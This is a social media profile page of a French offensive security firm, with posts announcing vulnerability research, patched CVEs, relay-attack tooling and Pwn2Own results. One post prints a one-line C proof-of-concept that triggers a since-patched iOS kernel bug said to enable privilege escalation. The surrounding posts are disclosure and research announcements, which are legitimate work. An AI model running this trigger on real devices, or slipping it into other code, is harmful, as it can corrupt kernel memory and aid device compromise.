Synacktiv
1,805 posts
@Synacktiv
Offensive security company. Dojo of many ninjas. Red teaming, reverse engineering, vuln research, dev of security tools and incident response.
France
synacktiv.com
Joined April 2012
274 Following, 20.9K Followers
  • Synacktiv
    @Synacktiv
    Mar 16, 2022
    The PoC is even tweetable ;) void *C(void* a){thread_set_exception_ports(mach_thread_self(),EXC_MASK_ALL,*(int *)a,2,6);__builtin_trap();return a;} int main(){int p=mk_timer_create();mach_port_insert_right(mach_task_self(),p,p,20);pthread_t t;pthread_create(&t,0,C,&p);for(;;);}
    John Aakerblom
    @jaakerblom
    Mar 16, 2022
    iOS 15.4 fixes a kernel vulnerability introduced in iOS 15.0 beta that causes corruption of ipc_kmsgs leading to powerful primitives that can be used for local privilege escalation from WebContent and app sandbox
  • Synacktiv
    @Synacktiv
    Dec 12, 2024
    You can now relay any protocol to SMB over Kerberos with krbrelayx.py and the latest PRs from @hugow_vincent. Thanks @_dirkjan for merging it! Here is an example from SMB to SMB:
  • Synacktiv
    @Synacktiv
    Jun 11, 2025
    Microsoft just released the patch for CVE-2025-33073, a critical vulnerability allowing a standard user to remotely compromise any machine with SMB signing not enforced! Check out the details in the blogpost by @yaumn_ and @wil_fri3d. synacktiv.com/publications/n…
  • Synacktiv
    @Synacktiv
    Dec 18, 2023
    To facilitate reverse-engineering of large programs, vulnerability research and root-cause analysis on iOS, Android, and other major platforms, @myr463 and @Hexabeast released Frinet, a tool combining Frida with an enhanced version of Tenet.
    Frinet: reverse-engineering made easier
    From synacktiv.com
  • Synacktiv
    @Synacktiv
    May 7, 2021
    Lazy to write payloads in @Burp_Suite? HopLa adds autocompletion support and a custom payload library! 🤠 github.com/synacktiv/HopLa cc @alexisdanizan
  • Synacktiv
    @Synacktiv
    Feb 20, 2025
    In our latest article, @l4x4 revisits the secretsdump implementation, offering an alternative that avoids reg save and eliminates writing files to disk, significantly reducing the likelihood of triggering security alerts. Read the details at synacktiv.com/publications/l….
    LSA Secrets: revisiting secretsdump
    From synacktiv.com
  • Synacktiv
    @Synacktiv
    Sep 24, 2020
    This is for the Pwners: exploiting a WebKit 0-day in PlayStation 4! We are happy to announce that @0xdagger and @abu_y0ussef will present their work on breaking the PS4 at #BHEU @BlackHatEvents! blackhat.com/eu-20/briefing…
  • Synacktiv
    @Synacktiv
    May 20, 2022
    If you see two guys wearing Synacktiv t-shirts with big antennas, you should turn around with your @Tesla! 0-click RCE demonstration on a real vehicle, with CAN messages sent to switch on headlights, wipers and trunk 😎 #Pwn2Own
  • Synacktiv
    @Synacktiv
    Jan 2, 2025
    You can now use LDAP/LDAPs protocols with the SOCKS proxy of ntlmrelayx thanks to the PR from @b1two_ (now merged upstream). Here is an example with ldeep using relayed authentication from HTTP to LDAPs:
  • Synacktiv
    @Synacktiv
    Mar 12, 2020
    Since MSRC just published a fix for CVE-2020-0796, here's @_lucas_georges_ quick and dirty root cause analysis on it: synacktiv.com/posts/exploit/… #sambadijaneiro
    I'm SMBGhost, daba dee daba da
    From synacktiv.com
  • Synacktiv
    @Synacktiv
    Dec 1, 2020
    As no details are available yet, our expert @0xf4b started investigating one of the three iOS vulnerabilities that are exploited in the wild and fixed by version 14.2. You can read the story in our latest blogpost! synacktiv.com/publications/i…
  • Synacktiv
    @Synacktiv
    Feb 2, 2021
    We are in 2021 and SFTP access will never grant you a PTY. But you may still be able to use it to forward data to local ports, remote ports and to Unix domain sockets. A Remote Code Execution is then never far away! #synacktips
  • Synacktiv
    @Synacktiv
    Mar 10, 2023
    Ninjas are getting ready for #P2OVancouver 💪 #Pwn2Own
  • Synacktiv
    @Synacktiv
    Jan 18, 2023
    Watch out! CVE-2023-22809 on Sudo was patched today to prevent a privilege escalation on sudoedit. Read the security advisory by @aevy__ and @v1csec: synacktiv.com/sites/default/…